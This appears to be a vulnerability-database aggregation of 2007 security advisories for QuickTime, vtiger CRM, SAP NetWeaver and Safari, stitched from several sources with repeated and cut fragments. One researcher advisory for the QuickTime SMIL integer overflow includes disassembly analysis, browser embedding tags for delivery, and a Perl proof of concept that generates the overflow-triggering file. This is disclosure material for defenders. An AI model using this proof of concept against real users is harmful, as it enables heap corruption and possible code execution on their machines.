II. For further information, please see
the Vulnerability Notes Database.
III. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2. This and other updates for Mac OS X are
available via Apple Update.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
VAR-200707-0547 | CVE-2007-2394 | Apple QuickTime fails to properly handle malformed movie files |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer overflow in Apple QuickTime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via crafted (1) title and (2) author fields in an SMIL file, related to improper calculations for memory allocation. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.
Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks.
----------------------------------------------------------------------
TITLE:
Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26034
VERIFY ADVISORY:
http://secunia.com/advisories/26034/
CRITICAL:
Highly critical
IMPACT:
Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION:
1.1 originally posted 2007-07-12
SOFTWARE:
Apple QuickTime 7.x
http://secunia.com/product/5090/
DESCRIPTION:
Some vulnerabilities have been reported in Apple QuickTime, which can
be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
2) An unspecified error exists in the processing of movie files.
5) A design error exists in QuickTime for Java, which can be
exploited to disable security checks and execute arbitrary code when
a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be
exploited to bypass security checks and read and write to process
memory.
7) A design error exists in QuickTime for Java due to JDirect
exposing interfaces that may allow loading arbitrary libraries and
freeing arbitrary memory.
8) A design error exists in QuickTime for Java, which can be
exploited to capture the user's screen content when a user visits a
web site containing a specially crafted Java applet.
QuickTime 7.2 for Mac:
http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows:
http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Tom Ferris, Security-Protocols.com and Matt
Slot, Ambrosia Software, Inc.
2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software.
3) The vendor credits Tom Ferris, Security-Protocols.com.
5, 6, 7) The vendor credits Adam Gowdiak.
8) Reported by the vendor.
CHANGELOG:
2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305947
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES:
US-CERT VU#582681:
http://www.kb.cert.org/vuls/id/582681
----------------------------------------------------------------------
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007
Last revised: --
Source: US-CERT
Systems Affected
Apple QuickTime on systems running
* Apple Mac OS X
* Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way
Java applets and various types of media files are handled. Since QuickTime configures most
web browsers to handle QuickTime media files, an attacker could
exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes
Database. For further information, please see
the Vulnerability Notes Database. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2.
On Microsoft Windows, QuickTime users can install the update by
using the built-in auto-update mechanism, Apple Software Update, or
by installing the update manually. Disabling QuickTime in your web browser may defend
against this attack vector. For more information, refer to the
Securing Your Web Browser document. Disabling Java in your web browser may defend against
this attack vector. Instructions for disabling Java can be found in
the Securing Your Web Browser document.
References
* Vulnerability Notes for QuickTime 7.2 -
<http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72>
* About the security content of the QuickTime 7.2 Update -
<http://docs.info.apple.com/article.html?artnum=305947>
* How to tell if Software Update for Windows is working correctly when no updates are available -
<http://docs.info.apple.com/article.html?artnum=304263>
* Apple QuickTime 7.2 for Windows -
<http://www.apple.com/support/downloads/quicktime72forwindows.html>
* Apple QuickTime 7.2 for Mac -
<http://www.apple.com/support/downloads/quicktime72formac.html>
* Standalone Apple QuickTime Player -
<http://www.apple.com/quicktime/download/standalone.html>
* Mac OS X: Updating your software -
<http://docs.info.apple.com/article.html?artnum=106704>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
.
II. When parsing an SMIL file,
arithmetic calculations can cause insufficient memory to be allocated.
When copying in user-supplied data from the SMIL file, a heap-based
buffer overflow occurs. This results in a potentially exploitable
condition.
III. This could
be accomplished using a malicious SMIL file referenced from a website
under the attacker's control.
IV. Previous versions are
suspected to be vulnerable.
V. WORKAROUND
iDefense is currently unaware of any effective workarounds for this
vulnerability.
VI. VENDOR RESPONSE
Apple has released QuickTime 7.2 which resolves this issue. More
information is available via Apple's QuickTime Security Update page at
the URL shown below.
http://docs.info.apple.com/article.html?artnum=305947
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-2394 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. CREDIT
This vulnerability was reported to iDefense by David Vaartjes from ITsec
Security Services http://www.itsec-ss.nl/.
X. LEGAL NOTICES
Copyright © 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
.
iDefense confirmed the existence of this vulnerability in version
7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime
binaries for Windows XP and Vista are identical, this issue will
affect QuickTime running on Windows Vista also.
----------------------------------------------------------------------
FIXED VERSIONS
----------------------------------------------------------------------
Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS
X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this
issue. See [2] for additional information about this update.
QuickTime 7.2 is not available for the Windows 2000 platform.
Presumably, Apple dropped support for this platform.
----------------------------------------------------------------------
PRODUCT DESCRIPTION
----------------------------------------------------------------------
QuickTime is Apple's media player product. According to Apple,
QuickTime is downloaded over 10 million times a month. According to
Secunia, QuickTime is currently installed on over 50% of PCs [3].
The Synchronized MultiMedia Integration Language (SMIL) provides a
high-level scripting syntax for describing multimedia presentations.
SMIL files are text files that use XML-based syntax to specify what
media elements to present and where and when to present them. This can be exploited to overflow that heap
buffer with user supplied content, which eventually can result in the
execution of arbitrary code.
--
<smil>
<head>
<meta name="title" content="specific-length"/>
<meta name="author" content="specific-length"/>
</head>
</smil>
--
When such a SMIL file is parsed the length value of the author field
is stored in a short int data type (16 bit) without bounds checking.
In sub_66952B50(), this value is (sign) extended to a long int data
type (32 bit).
--
66952C9A push eax
66952C9B call sub_668B57D0
66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C]
66952CA5 mov edx, [esp+2Ch+arg_4]
66952CA9 lea ecx, [esp+2Ch+var_10]
--
So, when the length of the author field is >= 0x8000 bytes, it will be
extended to a length value between 0xffff8000 and 0xffffffff.
Next, in sub_668DCFD0() the sign extended length of the author field
is added to the length of the title field + 0x20:
--
668DD04D jnz short loc_668DD0A0
668DD04F test ebx, ebx
668DD051 jz loc_668DD1EB
668DD057 --> lea eax, [edi+ebx] // edi holds the length of
// the title field + 0x20.
// ebx holds the sign
// extended length of the
// author field.
668DD05A push eax
668DD05B push ecx
--
In sub_668DCA60(), 4 is added to the result of the calculation:
--
668DCB37 test edi, edi
668DCB39 jz short loc_668DCB40
668DCB3B --> lea eax, [edi+4] // edi holds the result
668DCB3E jmp short loc_668DCB42
--
Next, in sub_668F5550() the final length value is used as the dwBytes
argument in a call to HeapReAlloc():
--
668F555E push eax // dwBytes (user specified)
668F555F push ecx // lpMem
668F5560 push 1 // dwFlags
668F5562 push edx // hHeap
668F5563 --> call ds:HeapReAlloc
--
This allows for the allocation of a controlled amount of memory. For
example, when setting the length of the author field to 0xff00 (65280)
and the length of the title field to 0xdf (223), the following
situation occurs:
1: sub_66952B50():
0x0000ff00 will be sign extended to 0xffffff00.
2: sub_668DCFD0():
0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00
resulting in a length value of 0xffffffff.
3: sub_668DCA60():
0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.
4: sub_668F5550():
HeapReAlloc() will allocate 0x00000003 bytes of memory.
Next, the pointer returned by HeapReAlloc() is used by sub_668DCFD0()
as the dest argument in a call to memcpy():
--
668DD08E push ebx // count, length value right
// after sign extension
// (0xffffff00).
668DD08F push edx // src, buffer with user
// supplied (author) content.
668DD090 add eax, esi
668DD092 --> push eax // dest, 3 byte buffer.
668DD093 call _memcpy
668DD098 add esp, 18h
668DD09B jmp loc_668DD1E5
--
This copy action will result in an overflow of the 3 byte heap
buffer with data from the author field (user supplied). Due to the
large amount of data written, this will finally result in an access
violation when memory is read or written outside the heap page. The
exception is handled by the program and execution continues with a
corrupt heap.
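The length arithmetic traced above, modelled in C next to a bounds-checked form. This is an added example, not QuickTime code and not part of the original advisory; the function names and the MAX_FIELD_LEN cap are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed cap (not from the advisory): the largest length that fits the
 * signed 16-bit field the parser stores the author length in. */
#define MAX_FIELD_LEN 0x7FFFu

/* Step 1: the stored 16-bit length is sign-extended to 32 bits (movsx). */
static int32_t sign_extend16(uint16_t v)
{
    return v >= 0x8000u ? (int32_t)v - 0x10000 : (int32_t)v;
}

/* Steps 2-3: (title_len + 0x20) + extended author length, then + 4,
 * all in wrapping 32-bit arithmetic, as in the traced lea instructions. */
uint32_t flawed_alloc_size(uint16_t author_len, uint32_t title_len)
{
    uint32_t sum = (title_len + 0x20u) + (uint32_t)sign_extend16(author_len);
    return sum + 4u;
}

/* The memcpy() count is the sign-extended value, not the allocated size. */
uint32_t flawed_copy_count(uint16_t author_len)
{
    return (uint32_t)sign_extend16(author_len);
}

/* Hardened form: unsigned lengths, a range check before anything is
 * stored in a narrower type, and overflow-checked additions. */
bool checked_alloc_size(size_t author_len, size_t title_len, size_t *out)
{
    const size_t overhead = 0x20u + 4u;

    if (author_len > MAX_FIELD_LEN || title_len > MAX_FIELD_LEN)
        return false;
    if (title_len > SIZE_MAX - overhead)
        return false;
    size_t total = title_len + overhead;
    if (author_len > SIZE_MAX - total)
        return false;
    *out = total + author_len;
    return true;
}

int main(void)
{
    size_t n = 0;
    /* Lengths from the advisory's walk-through: author 0xff00, title 0xdf. */
    printf("flawed size  = 0x%08x\n", (unsigned)flawed_alloc_size(0xff00, 0xdf));
    printf("flawed count = 0x%08x\n", (unsigned)flawed_copy_count(0xff00));
    printf("checked      = %s\n",
           checked_alloc_size(0xff00, 0xdf, &n) ? "accepted" : "rejected");
    return 0;
}
```

For lengths below 0x8000 both functions compute the same size; they diverge only once the 16-bit value is read as negative, which is the case the range check rejects.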
For my platform (win2k), when a call to HeapAlloc() is executed the
unlink code of ntdll will "fail" because we have overwritten pointers
in the heap management structures of other heap buffers with our data.
The status of the registers during unlinking is:
--
EAX 78787878 <-- user supplied
ECX 78787878 <-- user supplied
EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
EBX 00000078
ESP 0012EDC8
EBP 0012EF84
ESI 01200000
EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx"
--
--
77f867e6 mov dword ptr ds:[ecx],eax
77f867e8 mov dword ptr ds:[eax+4],ecx
--
The unlink instructions will result in the following exception:
---------------------------
QuickTimePlayerMain: QuickTimePlayer.exe
"The instruction at "0x77f867e6" referenced memory at "0x78787878".
The memory could not be "written"
---------------------------
This shows that we are able to overwrite 4 bytes anywhere in the
address space of the process with "any" 4 byte value we want, which
can for example be exploited to overwrite function pointers like the
SEH or UEF to gain control of the process. This 4 byte overwrite via
the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking"
is used on these platforms.
----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------
This vulnerability can be triggered by luring a target user into
running a malicious SMIL file locally or via a webpage. In the latter
scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"
WIDTH="10" HEIGHT="10" >
<!-- malicious SMIL file -->
<PARAM NAME="src" VALUE="poc.smil" />
<EMBED
<!-- available .qtif or .mov file to start up QT for FF -->
SRC="available-sample.qtif"
<!-- malicious SMIL file -->
QTSRC="poc.smil"
WIDTH="10" HEIGHT="10"
PLUGINSPAGE="www.apple.com/quicktime/download"
TYPE="video/quicktime"
/>
</OBJECT>
----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------
#!/usr/bin/perl -w
####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes <d.vaartjes at gmail.com>
####
$file = "poc.smil";
$padd = "x";
$cop_len = 36;
####
# By choosing the following lengths the
# integer overflow will be triggered.
####
$tit_len = 223;
$auth_len = 65280;
open(FH,">$file") or die "Can't open file:$!";
print FH
"<smil>\n".
"<head>\n".
" <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n".
" <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n".
" <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n".
"</head>\n".
"</smil>";
close(FH);
----------------------------------------------------------------------
REFERENCES
----------------------------------------------------------------------
[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
[2] http://docs.info.apple.com/article.html?artnum=305947
[3] http://secunia.com/blog/7/
----------------------------------------------------------------------
DISCLOSURE TIMELINE
----------------------------------------------------------------------
04/02/2007 Initial vendor notification (by iDefense)
04/09/2007 Initial vendor response
07/11/2007 Apple security bulletin & patches available
07/11/2007 Public disclosure of iDefense advisory
09/03/2007 Public disclosure of this advisory
VAR-200707-0375 | CVE-2007-3600 | vtiger CRM wordintegration component vulnerability that bypasses field-level security permissions |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
WordPlugin in the wordintegration component in vtiger CRM before 5.0.3 allows remote authenticated users to bypass field level security permissions and merge arbitrary fields in an Email template, as demonstrated by the fields in the Contact module. vtiger CRM is prone to a remote security vulnerability.
VAR-200707-0373 | CVE-2007-3598 | vtiger CRM index.php vulnerability that discloses all user names |
CVSS V2: 5.5 CVSS V3: - Severity: MEDIUM |
index.php in vtiger CRM before 5.0.3 allows remote authenticated users to obtain all users' names and e-mail addresses, and possibly change user settings, via a modified record parameter in a DetailView action to the Users module. NOTE: the vendor disputes the changing of settings, reporting that the attack vector results in a "You are not permitted to execute this Operation" error message in a 5.0.3 demo. vtiger CRM is prone to a denial-of-service vulnerability.
VAR-200707-0489 | CVE-2007-3617 | vtiger CRM report module vulnerability that allows reading arbitrary private module entries |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The report module in vtiger CRM before 5.0.3 does not properly apply security rules, which allows remote authenticated users to read arbitrary private module entries. vtiger CRM is prone to a remote security vulnerability.
VAR-200707-0374 | CVE-2007-3599 | vtiger CRM vulnerability that allows importing and exporting contact information |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
vtiger CRM before 5.0.3 allows remote authenticated users to import and export the information for a contact even when they only have the View permission. vtiger CRM is prone to a remote security vulnerability.
VAR-200707-0379 | CVE-2007-3604 | vtiger CRM vulnerability that bypasses data restrictions |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
vtiger CRM before 5.0.3 allows remote authenticated users with access to the Analytics DashBoard menu to bypass data restrictions and read the pipeline of the entire organization, possibly involving modules/Potentials/Potentials.php. vtiger CRM is prone to a remote security vulnerability.
VAR-200707-0378 | CVE-2007-3603 | SQL injection vulnerability in the vtiger CRM dashboard |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in the dashboard (include/utils/SearchUtils.php) in vtiger CRM before 5.0.3 allows remote authenticated users to execute arbitrary SQL commands via the assigned_user_id parameter in a Potentials ListView action to index.php. vtiger CRM is prone to a sql-injection vulnerability.
VAR-200707-0376 | CVE-2007-3601 | vtiger CRM vulnerability that allows reading calendar items of specific users |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
vtiger CRM before 5.0.3, when a migrated build is used, allows remote authenticated users to read certain other users' calendar activities via a (1) home page or (2) event list view. vtiger CRM is prone to a remote security vulnerability.
VAR-200707-0488 | CVE-2007-3616 | vtiger CRM index.php vulnerability that allows administrative changes |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
index.php in vtiger CRM before 5.0.3 allows remote authenticated users to perform administrative changes to arbitrary profile settings via a certain profilePrivileges action in the Users module. vtiger CRM is prone to a denial-of-service vulnerability.
VAR-200707-0377 | CVE-2007-3602 | Data access vulnerability in the vtiger CRM SOAP web service |
CVSS V2: 5.5 CVSS V3: - Severity: MEDIUM |
The SOAP webservice in vtiger CRM before 5.0.3 does not ensure that authenticated accounts are active, which allows remote authenticated users with inactive accounts to access and modify data, as demonstrated by the Thunderbird plugin. vtiger CRM is prone to a remote security vulnerability.
VAR-200707-0487 | CVE-2007-3615 | Denial-of-service (DoS) vulnerability in Internet Communication Manager of SAP NetWeaver Application Server running on Windows |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Internet Communication Manager (aka ICMAN.exe or ICM) in SAP NetWeaver Application Server 6.x and 7.x, possibly only on Windows, allows remote attackers to cause a denial of service (process crash) via a URI of a certain length that contains a sap-isc-key parameter, related to configuration of a web cache. Internet Communication Manager is prone to a remote denial-of-service vulnerability.
A remote attacker can exploit this issue to cause the affected service to crash, effectively denying service to legitimate users.
The vulnerability is caused due to an error within the Internet
Communication Manager (ICM - ICMAN.exe) component and can be
exploited to crash the ICM process by requesting an overly long
(around 264 bytes), specially crafted URI.
SOLUTION:
Update to the latest version.
PROVIDED AND/OR DISCOVERED BY:
Mark Litchfield, NGSSoftware
ORIGINAL ADVISORY:
http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-internet-communication-manager-dos/
VAR-200707-0562 | CVE-2007-3514 | Apple Safari vulnerability that can bypass the same origin policy |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
Cross-domain vulnerability in Apple Safari for Windows 3.0.2 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute to a file:// location, a different vector than CVE-2007-3482. Safari For Windows is prone to a security bypass vulnerability.